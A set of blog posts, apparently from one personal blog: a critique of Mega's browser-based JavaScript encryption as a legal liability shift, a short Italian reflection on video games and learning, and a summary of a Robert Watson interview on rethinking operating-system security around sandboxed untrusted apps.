Cryptography as Liability Shift

Everybody seems to be talking about Kim Dotcom’s new Mega file-sharing service. What arouse my interest is the use of cryptography. I did not look into it in details but from what I read (for example here) it should work as follows:

  • access to the service is only through a browser and the code executed in the browser is written in JavaScript;
  • at the moment of creating an account, the users chooses a password which is not sent to the server, instead from the password the browser derives an authentication token which is shared with the server; the server cannot recover the password from the authentication token;
  • the browser generates an encryption key with which all data sent and received by the server is encrypted and decrypted by the browser itself: the server hosts only encrypted data and has no access to it since it does not know the encryption key;
  • for user convenience, the encryption key is stored also on the server but encrypted with the password, in this way the server has no access to the encryption key but the user can retrieve it when he needs it.

This general idea of this approach is of course not new, but the way in which it is implemented leaves a lot to think about. Everything is delegated to the browser and implemented in JavaScript, this means for example that it is not so hard to add (or modify) a JavaScript to obtain the password and send it to any other server. This is indeed what most online banking malware do by injecting in the browsers a few lines of JavaScript in the home pages of the online banking websites’ pages. This is also what at any moment the Mega service could do, without the user ever know it. On top of this, many other points should be checked like for example if the implementation is sound from a security point of view, and we very well know that it is not at all easy to implement cryptographic protocols the first time without making any mistake.

So what is the point of all of this? Well, the first thing that comes to my mind (and to other bloggers’ mind) is that the primary purpose of all of this is not to protect the users and the users’ data, but to allow Kim Dotcom to discharge any legal responsibility on the contents hosted on his servers. Since users’ data is encrypted by the browser on the users’ PC and the server has no access in clear to the encryption keys, then all the responsibility on the data hosted on his servers is of the users.

I am curious to see how this will develop.

UPDATE: there are already search engines to find illegal material to download from Mega…

Apprendimento e Gaming

Recentemente mi è capitato più volte di leggere o discutere della relazione tra il gioco, in questo caso digitale (su console, PC o online) e l’apprendimento. In realtà ben sappiamo che il gioco è il principale mezzo di apprendimento, insieme all’esperienza, sia degli animali che di noi stessi nei primi anni della nostra vita.

“Giocando (e sbagliando) s’impara” diceva mio nonno…

In realtà, a pensarci un attimo, il nostro apprendimento è basato soprattutto sul nozionismo che poi si traduce in conoscenza a mio parere solo se integrato dall’esperienza. Si impara molto anche solo dall’esperienza diretta, ma è un procedimento lento e che non sfrutta quanto è già stato scoperto da chi ci ha preceduto e che possiamo facilmente e velocemente assimilare.

Ma l’esperienza Virtuale? Apprendiamo lo stesso giocando coi “balocchi” e un videogioco? Possiamo sostituire ed estendere il gioco reale con il gioco virtuale? Possiamo sostituire parte dell’apprendimento nozionistico con un apprendimento ludico virtuale?

Mi ha fatto anche riflettere il fatto che l’addestramento dei piloti dei famosi F-35 (se mai voleranno) è solo virtuale, non esistono modelli con doppi comandi per istruttore-allievo: dal gioco al volo senza paracadute?

Computer Security from bottom-up with a “clean slate”

This is my first post in my new blog and I would like to start with this interview to Robert Watson (Cambridge University UK) on IEEE Spectrum which I found interesting. The main points in my opinion are:

The role of operating system security has shifted from protecting multiple users from each other toward protecting a single…user from untrustworthy applications.…Embedded devices, mobile phones, and tablets are a point of confluence: The interests of many different parties…must be mediated with the help of operating systems that were designed for another place and time.

[…]

in historic systems, large multiuser computer systems, you know, we had these central servers or central mainframes, lots of end users on individual terminals. The role of the OS was to help separate these users from each other, to prevent accidents, perhaps to control the flow of information. You didn’t want trade secrets leaking from, perhaps, one account on a system to another one.

[…]

So the observation we make on these new end-user systems like phones is that what we’re trying to control is very different. The phone is a place where lots of different applications meet. […]  And on phones today, we encourage users to download things all the time. So what has changed now? Well, we’ve deployed something called sandboxing inside of these phones so that every application you download runs inside its own sandbox. And that is a very different use of security. And it is provided by the operating system, so it’s still a function of the operating system.

The main point is that we should re-think security from bottom-up starting with a new paradigm for the OS primitives, the main scenario which we should add to the historical one is the single-user multiple-untrusted applications, whereas all our OSes have been designed for the multiple-users multiple-trusted applications scenario.

This also reminds me of Qubes and Bromium which are efforts to obtain a larger control on applications by using microkernels and Virtual Machines as underlying OS.

An article by Watson will be published in the February 2013 issue of Communications of the ACM.